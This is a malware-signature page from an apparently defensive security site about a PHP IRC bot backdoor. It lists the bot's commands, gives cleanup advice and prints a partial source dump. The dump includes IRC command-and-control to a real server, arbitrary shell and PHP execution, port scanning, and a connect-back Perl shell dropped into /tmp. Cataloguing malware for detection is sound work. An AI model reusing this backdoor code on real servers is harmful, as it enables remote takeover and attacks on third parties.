Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.ircbot.002

php.hacktool.ircbot.002

IRC bot is type of a backdoor that receives commands via IRC (Internet Relay Chat) protocol. It connects to some chatroom and "listens" to discussions there.
When it encounters specific code words (commands) it tries to excecute corresponding action on the hacked server and output results to the chat room. Such boths can execute arbitrary PHP code and shell commands,
they can send emails and DDoS third-party sites and server. Here is a list of commands supported by one of such malicious IRC bots:

.user <password> //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail <to> <from> <subject> <msg> //send an email
.dns <IP|HOST> //dns lookup
.download <URL> <filename> //download a file
.exec <cmd> // uses exec() //execute a command
.sexec <cmd> // uses shell_exec() //execute a command
.cmd <cmd> // uses popen() //execute a command
.info //get system information
.php <php code> // uses eval() //execute php code
.tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
.udpflood <target> <packets> <packetsize> <delay> //udpflood attack
.raw <cmd> //raw IRC command
.rndnick //change nickname
.pscan <host> <port> //port scan
.safe // test safe_mode (dvl)
.inbox <to> // test inbox (dvl)
.conback <ip> <port> // conect back (dvl)
.uname // return shell's uname using a php function (dvl)

Affecting

Any servers with enabled PHP

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors. Don't forget to check server temporary directory such as /tmp and /var/tmp.
You can also sign up with us and let our team remove the malware for you.

Dump


...
class pBot
{
var $config = array("server"=>"irc.unixon.net",
"port"=>"7100",
"pass"=>"",
"prefix"=>"Pret",
"maxrand"=>"4",
"chan"=>"#dor",
"chan2"=>"#dor",
"key"=>"dor",
"modes"=>"+p",
"password"=>"dor",
"trigger"=>".",
"hostauth"=>"racrew" // * for any hostname (remember: /setvhost pucorp.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range("0","9");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
...
case "inbox": //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = "From: <inbox".$token."@gmail.com>";
$a = php_uname();
$b = getenv("SERVER_SOFTWARE");
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003nnip: $c nsoftware: $b nsystem: $a nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."nngreetz: wickednby: dvl <kamehame.dragon@gmail.com>",$header))
{
$this->privmsg($this->config['chan'],"[2inbox2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[2inbox2]: Message sent to 2".$mcmd[1]."2");
}
}
...
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[2info2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[2vuln2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[2bot2]: phpbot 2.0 by; #crew@corp.");
break;
...
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[2popen2]: $command");
$pipe = popen($c
ommand,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}

case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[2pscan2]: ".$mcmd[1].":".$mcmd[2]." is 2open2");
else
$this->privmsg($this->config['chan'],"[2pscan2]: ".$mcmd[1].":".$mcmd[2]." is 2closed2");
}
break;
...
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
...
$bot = new pBot;
$bot->start();